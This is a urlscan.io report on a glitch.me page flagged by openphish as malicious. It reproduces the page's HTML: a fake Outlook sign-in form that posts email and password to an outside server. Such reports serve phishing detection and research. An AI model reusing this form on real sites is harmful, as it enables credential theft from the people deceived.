webservices-outlook.glitch.me Open in urlscan Pro
3.224.12.100  Malicious Activity! Public Scan

URL: https://webservices-outlook.glitch.me/js
Submission: On May 08 via automatic, source openphish — Scanned from DE

Form analysis 1 forms found in the DOM

Name: myFormPOST https://learningserver1.online/servers/

<form method="post" action="https://learningserver1.online/servers/" name="myForm">
  <div class="middle_contents">
    <div class="centercontents">
      <div class="leftcontents">
        <div class="topicon">
          <img src="https://cdn.glitch.global/1d8186bf-faff-4206-8be3-a0813ae8b0bf/header_bg.png?v=1664092170633">
        </div>
        <div class="label"> Email Address: </div>
        <div>
          <input type="email" name="email" class="textinput" required="">
        </div>
        <!--		<div class="label">
										Domain\user name: 
									</div>
								
								<div>
									<input type="text" name="user" class="textinput" required="">
								</div>  -->
        <div class="label"> Password: </div>
        <div>
          <input type="password" name="pwd" class="textinput" required="">
          <input type="hidden" name="out-look1">
        </div>
        <br>
        <!--
								<div class="lgbtn" onClick="myFunction()">
								<img class="img" src="images/icon.png" /> 
								<span class="txt">sign in</span>
								</div>
-->
        <!--								<button type="submit"  class="lgbtn btn" onClick="myFunction()">-->
        <button type="submit" class="lgbtn btn">
          <img class="img" src="https://cdn.glitch.global/1d8186bf-faff-4206-8be3-a0813ae8b0bf/icon.png?v=1664092170616">
          <span class="txt">sign in</span>
        </button>
      </div>
    </div>
  </div>
</form>

Text Content

Email Address:

Password:


sign in